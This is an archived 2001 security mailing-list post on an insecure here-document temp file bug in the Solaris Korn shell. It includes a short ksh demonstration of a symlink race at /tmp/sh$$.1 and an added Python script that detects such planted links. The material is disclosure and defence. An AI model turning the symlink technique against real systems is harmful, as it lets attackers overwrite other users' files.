> Here is an exploit to an old bug for patchadd in Solaris. ...
> #See BID http://www.securityfocus.com/bid/2127

The bug is not in the patchadd script, but in the Korn shell ksh that
creates "here documents" insecurely.

Demonstration (ksh is vulnerable if the size of silly.1 is changed):

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

Note that there is a similar bug in the Bourne shell sh.

For a historical perspective see articles:

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716at_private
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385at_private
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182at_private
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620at_private

Cheers,

Paul Szabo - pszat_private  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney  2006  Australia
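Added example, not part of Paul Szabo's post: a defender-side audit that lists symlinks in a temp directory carrying the predictable here-document scratch name (sh<pid>.<n>, taken from the demonstration above). A shell only ever creates a regular file under that name, so a symlink there was planted by someone else. The name pattern, the directory argument and the output format are assumptions of this script.

```python
import os
import re
import stat
import sys

# ksh writes each here document to a scratch file named sh<pid>.<n> in /tmp
# (the demonstration pre-plants /tmp/sh$$.1).  The shell itself only ever
# creates a regular file there, so a symlink with such a name is a planted link
# that the shell would follow and overwrite.  Pattern assumed from the post.
HEREDOC_TMP_NAME = re.compile(r"^sh\d+\.\d+$")


def find_planted_links(tmpdir="/tmp"):
    """Return findings for symlinks in tmpdir that use the shell's predictable
    here-document scratch names: where each link points, whether the target
    lies outside tmpdir, and whether it does not exist yet (the shell would
    create it through the link)."""
    tmpdir = os.path.realpath(tmpdir)
    findings = []
    for name in sorted(os.listdir(tmpdir)):
        if not HEREDOC_TMP_NAME.match(name):
            continue
        path = os.path.join(tmpdir, name)
        try:
            st = os.lstat(path)          # lstat: inspect the link, not its target
        except FileNotFoundError:
            continue                     # removed between listdir and lstat
        if not stat.S_ISLNK(st.st_mode):
            continue                     # regular scratch file: what the shell makes
        resolved = os.path.realpath(path)
        findings.append({
            "link": path,
            "target": os.readlink(path),
            "resolved": resolved,
            "outside_tmp": os.path.commonpath([tmpdir, resolved]) != tmpdir,
            "dangling": not os.path.exists(resolved),
            "link_uid": st.st_uid,       # who planted it
        })
    return findings


if __name__ == "__main__":
    for f in find_planted_links(sys.argv[1] if len(sys.argv) > 1 else "/tmp"):
        flags = [k for k in ("outside_tmp", "dangling") if f[k]]
        print("%s -> %s (uid %d) %s" % (f["link"], f["target"],
                                        f["link_uid"], " ".join(flags)))
```

Run it as the victim user before invoking ksh scripts that use here documents, or periodically from cron against /tmp.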
This archive was generated by hypermail 2b30 : Mon Aug 27 2001 - 14:30:33 PDT